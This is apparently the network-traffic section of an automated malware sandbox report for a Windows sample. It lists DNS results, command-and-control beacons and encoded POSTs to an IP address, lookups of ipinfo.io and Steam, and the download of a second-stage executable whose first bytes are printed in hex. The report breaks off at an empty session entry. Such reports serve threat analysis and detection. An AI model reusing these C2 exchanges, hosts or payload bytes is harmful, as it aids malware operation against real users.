Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		63.143.98.185	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		109.175.29.39	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		175.119.10.231	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.224.203.37	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.211.208.213	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		148.230.249.9	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.134.67.105	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.98.23.157	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.170.162.36	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:08.270826101 CET	1.1.1.1	192.168.2.4	0x6ec3	Name error (3)	hDKjcHsRQifZLtWksCNqPALBxed.hDKjcHsRQifZLtWksCNqPALBxed	none	none	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:28.536809921 CET	1.1.1.1	192.168.2.4	0xf01d	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:30.894717932 CET	1.1.1.1	192.168.2.4	0x4fea	No error (0)	steamcommunity.com		104.104.85.160	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:41.336004972 CET	1.1.1.1	192.168.2.4	0x7284	Name error (3)	hDKjcHsRQifZLtWksCNqPALBxed.hDKjcHsRQifZLtWksCNqPALBxed	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	46.226.167.187	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:53.316734076 CET	209	OUT	GET /api/bing_release.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 46.226.167.187
Mar 28, 2024 09:14:53.504113913 CET	261	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 68 61 72 72 79 33 31 33 Data Ascii: harry313
Mar 28, 2024 09:14:56.965857983 CET	273	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 113 Host: 46.226.167.187
Mar 28, 2024 09:14:56.967664957 CET	113	OUT	Data Raw: 64 61 74 61 3d 6d 38 74 54 7a 74 44 4f 75 58 53 70 39 6e 30 37 64 33 61 33 50 6f 36 33 56 56 44 35 48 48 5f 48 42 41 41 6f 78 7a 64 48 57 45 54 30 52 62 33 79 6c 79 33 78 33 63 6d 55 44 69 6c 73 6a 74 53 48 66 57 72 47 34 45 51 4b 4c 32 67 54 68 Data Ascii: data=m8tTztDOuXSp9n07d3a3Po63VVD5HH_HBAAoxzdHWET0Rb3yly3x3cmUDilsjtSHfWrG4EQKL2gThD16NUBlxXQmdUxkggvbQtXwOPUEJCc=
Mar 28, 2024 09:14:57.316890955 CET	382	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 128 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 32 35 30 38 6f 43 6d 32 4a 6f 75 69 67 2b 37 4d 77 77 4a 53 4d 2f 67 73 6a 33 32 39 76 57 45 30 6e 48 31 61 4a 55 73 69 76 77 70 6d 33 6e 34 50 34 4b 57 71 33 2f 67 75 42 33 78 4b 38 6d 47 6e 41 33 33 35 46 48 4b 67 6a 75 48 54 49 78 77 5a 6e 6a 6d 47 67 4c 56 36 6a 48 33 57 47 70 4b 58 4b 7a 65 69 76 69 78 55 77 47 55 4f 68 5a 2b 75 30 79 44 62 63 55 72 77 6b 56 54 33 36 48 33 6b Data Ascii: 2508oCm2Jouig+7MwwJSM/gsj329vWE0nH1aJUsivwpm3n4P4KWq3/guB3xK8mGnA335FHKgjuHTIxwZnjmGgLV6jH3WGpKXKzeivixUwGUOhZ+u0yDbcUrwkVT36H3k
Mar 28, 2024 09:14:57.603552103 CET	273	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 46.226.167.187
Mar 28, 2024 09:14:57.603588104 CET	133	OUT	Data Raw: 64 61 74 61 3d 54 34 6c 67 31 67 6a 63 47 43 4a 34 58 77 45 4d 44 52 31 31 36 47 72 34 6c 4e 67 6a 61 50 4e 79 56 6a 73 37 53 32 76 70 58 64 44 43 63 61 42 46 33 38 31 58 4c 5a 64 50 6c 73 68 67 6f 5f 4c 47 78 39 39 53 57 74 64 2d 37 34 63 6a 66 Data Ascii: data=T4lg1gjcGCJ4XwEMDR116Gr4lNgjaPNyVjs7S2vpXdDCcaBF381XLZdPlshgo_LGx99SWtd-74cjf5_L5irFAIy91Kt3AwSvY7d5J7ZJ9Y2q0XS852hG-ddYal7hHEZl
Mar 28, 2024 09:14:57.989278078 CET	1286	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 4076 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 42 43 72 32 50 67 44 57 35 75 48 56 51 6d 55 35 38 6e 58 70 57 55 76 7a 51 38 61 37 36 64 6d 66 41 6b 4d 4b 56 79 63 6d 77 48 74 74 63 58 6e 58 48 78 4b 42 75 49 50 7a 75 50 79 38 4c 32 4a 6e 75 30 55 43 46 47 47 39 77 71 30 42 41 4d 64 32 35 55 33 74 4b 73 62 63 31 71 36 36 62 6f 72 49 33 71 4b 64 35 53 41 75 4b 31 55 6c 35 4d 66 64 53 53 49 46 46 48 35 43 55 51 72 4e 6a 33 73 7a 5a 47 55 53 50 44 7a 70 65 6e 56 69 33 63 6d 7a 72 59 5a 75 43 69 50 54 6e 53 75 62 6f 57 73 6d 6a 64 5a 44 44 4e 63 32 33 50 78 4b 59 4e 4b 68 50 2f 33 44 46 46 7a 73 50 38 31 6c 53 33 48 2b 58 32 39 74 75 48 54 58 54 36 66 50 59 45 48 41 41 39 41 53 4b 76 58 6d 76 50 6a 32 43 58 51 77 63 44 4d 4b 38 41 68 45 68 69 36 72 79 45 6a 68 6c 6a 73 54 69 67 70 63 61 69 45 72 62 70 38 46 62 47 62 53 33 2b 33 47 37 4a 53 37 6a 72 63 32 62 6e 6d 34 62 6f 4b 53 53 75 6c 70 54 44 47 4e 55 4a 34 7a 66 72 6b 30 74 38 4f 53 6a 74 30 55 71 61 48 2b 71 56 6a 43 54 6a 6b 46 33 70 37 43 41 6e 38 56 37 4a 31 53 35 78 76 4b 6e 4a 57 59 4a 74 37 48 4f 6e 33 47 41 6d 70 32 72 72 36 5a 50 50 5a 4c 52 67 43 35 37 4f 6e 2b 2f 4d 61 53 42 74 44 5a 41 6a 76 75 67 77 6a 4d 37 79 50 57 32 4f 4b 4c 54 42 74 68 46 7a 30 43 4c 67 38 6d 4b 63 42 67 46 52 66 56 2b 47 6e 58 31 63 30 7a 73 6c 48 72 69 61 4e 36 47 2f 68 44 72 6d 44 54 47 61 5a 4a 58 49 41 49 42 30 73 7a 59 6b 33 54 36 42 2b 33 56 52 42 5a 7a 43 69 6f 6b 48 35 6d 50 41 67 76 53 43 6c 64 52 6c 51 56 35 74 4b 32 55 2f 70 54 72 38 7a 57 69 5a 45 74 64 72 65 61 47 4c 63 79 38 54 4a 79 46 73 67 6c 6a 6f 73 39 4b 45 44 67 6b 44 61 2b 53 49 52 5a 47 38 41 73 64 49 76 44 75 53 30 7a 41 47 42 46 45 54 2f 4c 6b 52 50 6d 73 6d 42 49 46 38 4d 7a 62 71 35 34 33 54 50 2f 75 70 64 4c 30 70 61 74 54 77 30 4e 43 67 77 35 6f 33 48 62 7a 4f 55 44 58 6f 31 57 38 41 51 52 4c 35 70 41 59 70 46 6f 4c 71 55 31 49 4b 33 30 66 6a 56 45 38 36 63 32 78 53 55 4c 75 41 7a 46 49 55 51 58 35 6c 59 39 68 2b 78 70 4f 51 6d 30 72 37 68 78 41 75 75 51 4d 61 36 47 51 64 67 37 4c 63 75 68 4a 61 48 75 71 54 63 37 48 68 33 6a 2b 77 51 68 41 31 63 69 46 4b 46 54 54 6a 30 41 47 78 67 49 59 53 30 66 50 41 6b 4b 36 39 37 69 69 73 43 4b 48 59 46 4e 63 67 43 5a 54 46 62 38 4d 62 6d 48 68 74 7a 67 63 70 71 61 68 36 72 44 68 7a 6a 41 35 37 67 38 34 68 53 49 74 49 65 74 41 6a 75 75 78 54 4c 6a 2b 77 57 6f 4d 41 6a 63 34 58 33 6e 6b 6d 5a 65 74 31 47 63 35 72 63 6d 43 6e 44 2f 68 6c 4f 37 31 77 72 66 34 73 31 6b 55 79 2f 4b 45 63 65 47 31 76 58 31 71 35 31 35 6d 2f 39 44 79 2b 2f 6e 41 52 66 4a 4c 56 42 57 42 30 41 76 65 2f 6b 65 56 33 72 58 32 6d 61 69 73 62 61 30 45 4a 5a 6a 4d 65 72 49 2f 62 32 6b 35 77 46 79 2f 64 4f 69 6f 59 47 4d 51 70 65 7a 31 68 6a 77 33 74 61 32 64 66 41 59 37 4d 64 51 52 35 45 42 43 2f 31 45 35 78 65 54 49 52 77 75 4c 4c 57 73 73 47 66 6d 42 34 69 74 75 58 37 42 54 6b 65 49 47 7a 72 2b 5a 2b 6d 33 48 6b 48 75 71 51 64 6a 49 52 6b 33 50 68 30 69 63 32 51 50 74 62 67 6b 72 49 78 4f 4e 72 52 67 6e 5a 74 4c 59 36 63 57 42 5a 41 53 62 4c 2b 64 79 6a 31 79 77 34 47 58 4e 72 75 76 63 37 35 36 57 71 77 6f 52 48 56 42 70 42 31 77 79 79 6a 73 76 38 41 45 36 64 51 Data Ascii: BCr2PgDW5uHVQmU58nXpWUvzQ8a76dmfAkMKVycmwHttcXnXHxKBuIPzuPy8L2Jnu0UCFGG9wq0BAMd25U3tKsbc1q66borI3qKd5SAuK1Ul5MfdSSIFFH5CUQrNj3szZGUSPDzpenVi3cmzrYZuCiPTnSuboWsmjdZDDNc23PxKYNKhP/3DFFzsP81lS3H+X29tuHTXT6fPYEHAA9ASKvXmvPj2CXQwcDMK8AhEhi6ryEjhljsTigpcaiErbp8FbGbS3+3G7JS7jrc2bnm4boKSSulpTDGNUJ4zfrk0t8OSjt0UqaH+qVjCTjkF3p7CAn8V7J1S5xvKnJWYJt7HOn3GAmp2rr6ZPPZLRgC57On+/MaSBtDZAjvugwjM7yPW2OKLTBthFz0CLg8mKcBgFRfV+GnX1c0zslHriaN6G/hDrmDTGaZJXIAIB0szYk3T6B+3VRBZzCiokH5mPAgvSCldRlQV5tK2U/pTr8zWiZEtdreaGLcy8TJyFsgljos9KEDgkDa+SIRZG8AsdIvDuS0zAGBFET/LkRPmsmBIF8Mzbq543TP/updL0patTw0NCgw5o3HbzOUDXo1W8AQRL5pAYpFoLqU1IK30fjVE86c2xSULuAzFIUQX5lY9h+xpOQm0r7hxAuuQMa6GQdg7LcuhJaHuqTc7Hh3j+wQhA1ciFKFTTj0AGxgIYS0fPAkK697iisCKHYFNcgCZTFb8MbmHhtzgcpqah6rDhzjA57g84hSItIetAjuuxTLj+wWoMAjc4X3nkmZet1Gc5rcmCnD/hlO71wrf4s1kUy/KEceG1vX1q515m/9Dy+/nARfJLVBWB0Ave/keV3rX2maisba0EJZjMerI/b2k5wFy/dOioYGMQpez1hjw3ta2dfAY7MdQR5EBC/1E5xeTIRwuLLWssGfmB4ituX7BTkeIGzr+Z+m3HkHuqQdjIRk3Ph0ic2QPtbgkrIxONrRgnZtLY6cWBZASbL+dyj1yw4GXNruvc756WqwoRHVBpB1wyyjsv8AE6dQ
Mar 28, 2024 09:14:57.989304066 CET	1286	IN	Data Raw: 6f 48 6b 6f 53 79 6f 4a 54 75 37 6c 59 49 71 59 4d 70 5a 77 59 52 41 45 56 4c 74 38 6a 71 53 37 74 79 52 43 77 5a 5a 53 47 6f 69 69 66 50 5a 35 32 56 58 50 6a 51 32 51 4d 37 31 45 48 43 31 4d 67 4a 35 76 32 76 76 39 51 39 63 50 49 44 36 52 33 49 Data Ascii: oHkoSyoJTu7lYIqYMpZwYRAEVLt8jqS7tyRCwZZSGoiifPZ52VXPjQ2QM71EHC1MgJ5v2vv9Q9cPID6R3I1glqsqoixeX3hfbyRM3XbIImkx/8wJgM7tflvLsDax7qYWCb93RAhSsGkWWkEpQzdh8ddtEbzhMwXCrhx+sAqWlEimysUscQUbT1j0R6yrKDhDoUJtJgzYE3U4opuxE6J6DuqLcc2z0vsZpceDrHHZxepVXnaEXp9
Mar 28, 2024 09:14:57.989316940 CET	1286	IN	Data Raw: 50 35 73 67 50 42 2f 47 7a 70 53 63 69 55 73 4e 31 31 36 67 2f 67 6c 49 69 58 2f 42 35 7a 53 59 2f 65 2b 4d 2b 66 33 78 35 39 64 6c 69 67 6d 77 33 53 6a 74 61 67 73 74 6b 36 70 4d 30 59 33 66 5a 73 58 4a 73 68 4e 51 45 73 37 32 6b 6b 6d 63 52 6d Data Ascii: P5sgPB/GzpSciUsN116g/glIiX/B5zSY/e+M+f3x59dligmw3Sjtagstk6pM0Y3fZsXJshNQEs72kkmcRm+LNxzhwCGwsAkZX5V65VIVGwbShQgjcqldVc+iQ9oUVWE5zsrKXkT6SfISQUognyDQDr+aNT+MPFVBSQ1ZHR2JnKHRhNYPPq0LC+k6OJSrxlv7uTxgqIaVArCSgVPQ0p/K6m2HF5HkCoGpWlg+x1rBvaRNMhChlN6
Mar 28, 2024 09:14:57.989326000 CET	473	IN	Data Raw: 52 58 36 48 75 31 68 43 4e 79 53 49 73 36 56 46 41 6f 43 34 46 55 51 6c 42 61 6d 2b 79 77 55 65 59 6f 74 41 2b 61 35 30 4f 36 62 61 67 55 37 5a 35 30 34 79 31 38 66 43 30 36 50 46 54 58 2f 43 4d 6b 37 71 67 48 4f 54 6e 38 57 46 42 57 38 4e 69 46 Data Ascii: RX6Hu1hCNySIs6VFAoC4FUQlBam+ywUeYotA+a50O6bagU7Z504y18fC06PFTX/CMk7qgHOTn8WFBW8NiFk1B6Tw/jve5XdFuNIONSoiFinFnc5kclkzoCjl6LCmxh+24IZsUEMHNjh9JpYFpl6v1UTo8QOetHFbhoyU2Sb5qvyfNEEGPnXsWXv53lKkBWn9TMvW+S3Y53V91OOIlayqHxko8ufTVMJXm07bBJ/otn1lAEifS52

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	18.205.93.0	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.370738029 CET	171	OUT	Data Raw: 16 03 03 00 a6 01 00 00 a2 03 03 66 05 27 01 d1 96 c7 60 78 23 46 dd 5a 30 8e 9f 93 aa ef d0 ea 1b 33 3c 37 a9 13 38 46 d9 fa d9 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'`x#FZ03<78F&,+0/$#('=<5/Sbitbucket.org#
Mar 28, 2024 09:14:58.465676069 CET	89	IN	HTTP/1.0 400 Bad request Content-Type: text/html Data Raw: 3c 68 32 3e 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 20 62 61 64 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a Data Ascii: <h2>Client sent a bad request.</h2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	185.172.128.6	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.373472929 CET	202	OUT	HEAD /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 185.172.128.6 Cache-Control: no-cache
Mar 28, 2024 09:14:58.556799889 CET	252	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 28 Mar 2024 08:00:02 GMT ETag: "47800-614b3e9132b65" Accept-Ranges: bytes Content-Length: 292864 Content-Type: application/x-msdos-program
Mar 28, 2024 09:14:58.557683945 CET	201	OUT	GET /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 185.172.128.6 Cache-Control: no-cache
Mar 28, 2024 09:14:58.741055965 CET	1286	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:14:58 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 28 Mar 2024 08:00:02 GMT ETag: "47800-614b3e9132b65" Accept-Ranges: bytes Content-Length: 292864 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 dc 51 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 08 6e 00 00 00 00 00 06 3c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6f 00 00 04 00 00 db 16 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 60 01 00 50 00 00 00 00 20 6e 00 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 6a 00 00 00 00 01 00 00 6c 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc a1 6c 00 00 70 01 00 00 3c 02 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 e6 00 00 00 20 6e 00 00 e6 00 00 00 92 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 45 f5 40 00 e8 99 23 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgQdn<@o`P n8U@.textP `.rdataLjl@@.datalp<V@.rsrc n@@hE@#
Mar 28, 2024 09:14:58.741074085 CET	1286	IN	Data Raw: 59 c3 68 3a f5 40 00 e8 8d 23 00 00 59 c3 68 2f f5 40 00 e8 81 23 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 80 38 00 75 04 33 c0 5d c3 50 e8 6b 1d 00 00 59 5d c3 55 8b ec f6 45 08 01 56 8b f1 c7 06 84 0f 41 00 74 07 56 e8 Data Ascii: Yh:@#Yh/@#YUE8u3]PkY]UEVAtVz#Y^]UUA;Bu;u3@3]UEUH]UQQuUuRP]UE;Hu;Eu3@3]TAUQue[YTAEQM
Mar 28, 2024 09:14:58.741127968 CET	1286	IN	Data Raw: 50 8d 45 e8 50 56 8d 85 80 f6 ff ff 50 68 34 55 41 00 ff 15 2c 00 41 00 8b 0d e4 ff ad 00 47 3b f9 72 88 8b fe 8d 04 39 3d 8d 00 00 00 75 6a 68 44 55 41 00 ff 15 64 00 41 00 56 8d 45 e8 50 56 8d 85 80 f6 ff ff 50 56 ff 15 10 00 41 00 56 56 ff 15 Data Ascii: PEPVPh4UA,AG;r9=ujhDUAdAVEPVPVAVVAEPAAVPV\|AVVPVDAPVXAG\|<t.YuVVAVVVA&OtTAbuuE
Mar 28, 2024 09:14:58.741143942 CET	1286	IN	Data Raw: 8b f1 74 20 83 7e 14 10 72 1a 53 8b 1e 85 ff 74 0b 57 53 56 e8 01 05 00 00 83 c4 0c 53 e8 a2 19 00 00 59 5b 89 7e 10 c7 46 14 0f 00 00 00 c6 04 37 00 5f 5e 5d c2 08 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7d 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 Data Ascii: t ~rStWSVSY[~F7_^]US]VS}t~ru+SVCW}jWt.~rtWSP~~r8_^[]UE9AryAr]hUAUVMW~;rfU
Mar 28, 2024 09:14:58.741178036 CET	1286	IN	Data Raw: 45 f4 c7 45 f4 28 10 41 00 50 e8 6b 1e 00 00 cc cc cc cc cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 68 03 00 00 0f ba 25 3c aa 43 00 01 73 07 f3 a4 e9 17 03 00 00 81 f9 80 00 00 00 0f 82 ce 01 00 00 8b Data Ascii: EE(APkWVt$L$\|$;v;h%<Cs3u%pA%<Csvs~vftcfoNvfo^0foF fon0v00fof:
Mar 28, 2024 09:14:58.741236925 CET	1286	IN	Data Raw: 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 Data Ascii: D$^_IFGFGD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tv
Mar 28, 2024 09:14:58.741252899 CET	1286	IN	Data Raw: 24 95 54 2a 40 00 8b ff f7 d9 ff 24 8d 04 2a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 58 29 40 00 ff 24 8d 54 2a 40 00 90 68 29 40 00 8c 29 40 00 b4 29 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 Data Ascii: $T@$@Ir+$X)@$T@h)@)@)@F#Gr$T@IF#GFGr$T@F#GFGFGV$T@I@@@ @(@0@8@K@DDDDD
Mar 28, 2024 09:14:58.741261005 CET	1286	IN	Data Raw: 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 55 8b ec 56 8b f1 8b 4d 08 c6 46 0c 00 85 c9 75 66 57 e8 7b 2c 00 00 8b f8 89 7e 08 8b 57 6c 89 16 8b 4f 68 89 4e 04 3b 15 d4 77 41 00 74 11 a1 98 78 41 00 85 47 70 75 07 e8 19 23 00 00 89 06 8b 46 04 5f 3b Data Ascii: +AL$+UVMFufW{,~WlOhN;wAtxAGpu#F_;luAtNxAApu{&FNApuApFAF^]UVW}?t~utwuMNEPPSYEYtxt~<;pt\|7jjptWjpA
Mar 28, 2024 09:14:58.741329908 CET	1286	IN	Data Raw: b8 00 08 00 00 3b f0 73 02 8b c6 8b 5d fc 03 c6 3b c6 72 0d 50 53 e8 b6 3c 00 00 59 59 85 c0 75 14 8d 46 10 3b c6 72 3e 50 53 e8 a2 3c 00 00 59 59 85 c0 74 31 c1 ff 02 50 8d 1c b8 ff 15 b0 00 41 00 a3 b0 01 ae 00 ff 75 08 ff 15 b0 00 41 00 8d 4b Data Ascii: ;s];rPS<YYuF;r>PS<YYt1PAuAKQAE3_^[]UuYH]5CAtjj\|<YY<<UVWuMIExtuuYMujjWVjpAu=
Mar 28, 2024 09:14:58.741344929 CET	1286	IN	Data Raw: 2c fc ff ff 59 8b f8 89 7d e4 c7 45 fc fe ff ff ff e8 0e 00 00 00 8b c7 e8 3e 32 00 00 c3 8b 75 08 8b 7d e4 56 e8 bb 25 00 00 59 c3 6a 08 68 88 5c 41 00 e8 de 31 00 00 ff 35 28 aa 43 00 ff 15 b4 00 41 00 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 Data Ascii: ,Y}E>2u}V%Yjh\A15(CAte3@eEjhh\A1"@xte3@eE7!@\|th8@A(Cjh\AN1}39Eu8s:j1
Mar 28, 2024 09:14:58.924413919 CET	1286	IN	Data Raw: 83 7d e4 00 75 06 56 e8 00 30 00 00 e8 59 2f 00 00 c7 45 fc fe ff ff ff 8b c6 e8 36 2d 00 00 c3 55 8b ec 83 3d 48 b4 43 00 01 75 05 e8 60 46 00 00 ff 75 08 e8 b5 46 00 00 68 ff 00 00 00 e8 f5 2e 00 00 59 59 5d c3 3b 0d 10 7f 41 00 75 02 f3 c3 e9 Data Ascii: }uV0Y/E6-U=HCu`FuFh.YY];AuNU VWjY@A}u}ttQpP }uttE@EPuuuA_^]Pd5D$+d$SVW(A3PeuEEdUV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	5.42.66.22	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
